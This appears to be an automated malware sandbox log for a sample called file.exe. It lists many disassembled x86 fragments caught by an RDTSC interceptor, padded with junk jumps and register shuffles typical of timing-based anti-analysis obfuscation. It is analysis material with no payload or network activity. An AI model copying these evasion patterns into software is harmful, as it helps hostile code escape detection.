Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50CA7 second address: 4C50D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F08C0CB452Ch 0x00000016 jmp 00007F08C0CB4535h 0x0000001b popfd 0x0000001c mov ch, 00h 0x0000001e popad 0x0000001f test ecx, ecx 0x00000021 pushad 0x00000022 mov dh, CAh 0x00000024 popad 0x00000025 jns 00007F08C0CB4563h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov dx, A30Ch 0x00000032 mov bl, E3h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50D07 second address: 4C50D78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91967h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add eax, ecx 0x0000000b jmp 00007F08C0C91966h 0x00000010 mov eax, dword ptr [eax+00000860h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edi 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F08C0C91969h 0x00000021 or ecx, 55106CA6h 0x00000027 jmp 00007F08C0C91961h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50D78 second address: 4C50DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, FFDEh 0x00000012 call 00007F08C0CB452Fh 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50DA7 second address: 4C50DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50DAD second address: 4C50DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50DB1 second address: 4C50DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50DB5 second address: 4C50DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F093299A4C8h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F08C0CB4539h 0x00000016 pop eax 0x00000017 mov esi, edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50DE3 second address: 4C50E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [eax+04h], 00000005h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F08C0C9195Dh 0x00000015 jmp 00007F08C0C91960h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70009 second address: 4C7000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7000E second address: 4C70014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70014 second address: 4C70018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70018 second address: 4C7001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7001C second address: 4C70058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F08C0CB452Fh 0x00000012 xor ax, 9F3Eh 0x00000017 jmp 00007F08C0CB4539h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70058 second address: 4C7005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7005E second address: 4C7008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08C0CB4534h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7008A second address: 4C70090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70090 second address: 4C70094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70094 second address: 4C700A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C700A3 second address: 4C700A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C700A7 second address: 4C700B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C700B9 second address: 4C700E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F08C0CB4536h 0x00000010 mov edx, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C700E9 second address: 4C700ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C700ED second address: 4C700F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C700F1 second address: 4C700F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C700F7 second address: 4C700FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C700FD second address: 4C70101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60615 second address: 4C60624 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60624 second address: 4C606C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08C0C9195Fh 0x00000009 xor si, B40Eh 0x0000000e jmp 00007F08C0C91969h 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F08C0C9195Dh 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F08C0C9195Eh 0x00000026 mov ebp, esp 0x00000028 jmp 00007F08C0C91960h 0x0000002d xchg eax, ecx 0x0000002e jmp 00007F08C0C91960h 0x00000033 push eax 0x00000034 jmp 00007F08C0C9195Bh 0x00000039 xchg eax, ecx 0x0000003a jmp 00007F08C0C91966h 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C606C6 second address: 4C606CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C606CA second address: 4C606D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C606D0 second address: 4C606FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F08C0CB4532h 0x00000008 pop esi 0x00000009 mov eax, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F08C0CB452Ch 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C606FD second address: 4C6073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop ebx 0x00000006 popad 0x00000007 mov esi, 6101B295h 0x0000000c popad 0x0000000d lea eax, dword ptr [ebp-04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F08C0C9195Dh 0x00000018 pushfd 0x00000019 jmp 00007F08C0C91960h 0x0000001e adc cl, FFFFFF98h 0x00000021 jmp 00007F08C0C9195Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6073E second address: 4C60744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60744 second address: 4C60748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60748 second address: 4C60783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f pushfd 0x00000010 jmp 00007F08C0CB4535h 0x00000015 adc cl, FFFFFFE6h 0x00000018 jmp 00007F08C0CB4531h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60783 second address: 4C607B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F08C0C9195Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 mov si, E2CDh 0x00000019 push eax 0x0000001a push edx 0x0000001b mov ecx, 7D2160EFh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6090F second address: 4C6000D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F08C0CB4532h 0x0000000e popad 0x0000000f retn 0004h 0x00000012 nop 0x00000013 cmp eax, 00000000h 0x00000016 setne al 0x00000019 xor ebx, ebx 0x0000001b test al, 01h 0x0000001d jne 00007F08C0CB4527h 0x0000001f xor eax, eax 0x00000021 sub esp, 08h 0x00000024 mov dword ptr [esp], 00000000h 0x0000002b mov dword ptr [esp+04h], 00000000h 0x00000033 call 00007F08C4F6BDBDh 0x00000038 mov edi, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push edx 0x0000003e pop eax 0x0000003f mov ebx, 13E8690Ch 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6000D second address: 4C6003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 5437h 0x00000007 mov si, FCD3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F08C0C91966h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov al, 60h 0x0000001a push edx 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6003B second address: 4C60090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, B8CDh 0x0000000f jmp 00007F08C0CB452Ah 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007F08C0CB4530h 0x0000001c push FFFFFFFEh 0x0000001e pushad 0x0000001f mov ax, A1ADh 0x00000023 pushad 0x00000024 mov edi, esi 0x00000026 mov ecx, 039182EBh 0x0000002b popad 0x0000002c popad 0x0000002d push 34987767h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60090 second address: 4C60096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60096 second address: 4C6009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6009C second address: 4C600A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C600A0 second address: 4C600A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C600A4 second address: 4C600DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 420226E1h 0x0000000f jmp 00007F08C0C91969h 0x00000014 push 58F6A63Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F08C0C9195Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C600DD second address: 4C600F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1D9E8531h 0x00000010 pushad 0x00000011 pushad 0x00000012 mov bl, ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C600F9 second address: 4C6015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr fs:[00000000h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F08C0C9195Ch 0x00000019 add si, 7298h 0x0000001e jmp 00007F08C0C9195Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F08C0C91968h 0x0000002a jmp 00007F08C0C91965h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6015A second address: 4C6018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F08C0CB452Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F08C0CB452Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6018F second address: 4C601B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08C0C91965h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C601B6 second address: 4C60245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007F08C0CB452Eh 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F08C0CB4530h 0x00000017 push eax 0x00000018 jmp 00007F08C0CB452Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F08C0CB4536h 0x00000023 xchg eax, esi 0x00000024 jmp 00007F08C0CB4530h 0x00000029 push eax 0x0000002a jmp 00007F08C0CB452Bh 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F08C0CB4535h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60245 second address: 4C6028D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F08C0C9195Eh 0x0000000f push eax 0x00000010 jmp 00007F08C0C9195Bh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F08C0C91965h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6028D second address: 4C602AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [769B4538h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edi, cx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602AF second address: 4C602B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602B4 second address: 4C602F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F08C0CB4537h 0x0000000b jmp 00007F08C0CB4533h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xor dword ptr [ebp-08h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 19FF6206h 0x0000001f mov ebx, 221F9892h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602F9 second address: 4C602FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602FF second address: 4C60303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60303 second address: 4C60307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60307 second address: 4C6035B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a jmp 00007F08C0CB4537h 0x0000000f nop 0x00000010 jmp 00007F08C0CB4536h 0x00000015 push eax 0x00000016 pushad 0x00000017 push edi 0x00000018 mov edi, esi 0x0000001a pop ecx 0x0000001b mov dx, 394Ch 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F08C0CB452Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6035B second address: 4C603AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F08C0C91964h 0x00000013 and si, 57C8h 0x00000018 jmp 00007F08C0C9195Bh 0x0000001d popfd 0x0000001e call 00007F08C0C91968h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C603AE second address: 4C603F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr fs:[00000000h], eax 0x0000000c jmp 00007F08C0CB4537h 0x00000011 mov dword ptr [ebp-18h], esp 0x00000014 jmp 00007F08C0CB4536h 0x00000019 mov eax, dword ptr fs:[00000018h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 movsx edx, si 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C603F9 second address: 4C6040D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91960h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6040D second address: 4C60411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60411 second address: 4C6042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [eax+00000FDCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F08C0C9195Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6042B second address: 4C60431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60431 second address: 4C60435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60435 second address: 4C6048E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F08C0CB4532h 0x00000013 jmp 00007F08C0CB4535h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F08C0CB4530h 0x0000001f sub si, B608h 0x00000024 jmp 00007F08C0CB452Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6048E second address: 4C604A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91964h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604A6 second address: 4C604AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604AA second address: 4C604BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F08C0C919B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604BE second address: 4C604C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604C2 second address: 4C604C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604C8 second address: 4C60504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 6944h 0x00000007 mov bl, D5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F08C0CB4531h 0x00000017 xor cx, 8936h 0x0000001c jmp 00007F08C0CB4531h 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60504 second address: 4C60509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60509 second address: 4C60527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F08C0CB452Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60527 second address: 4C60536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60536 second address: 4C60566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 jmp 00007F08C0CB4530h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test ecx, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F08C0CB452Dh 0x00000018 mov cx, 11D7h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50207 second address: 4C50223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08C0C91968h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50223 second address: 4C50227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
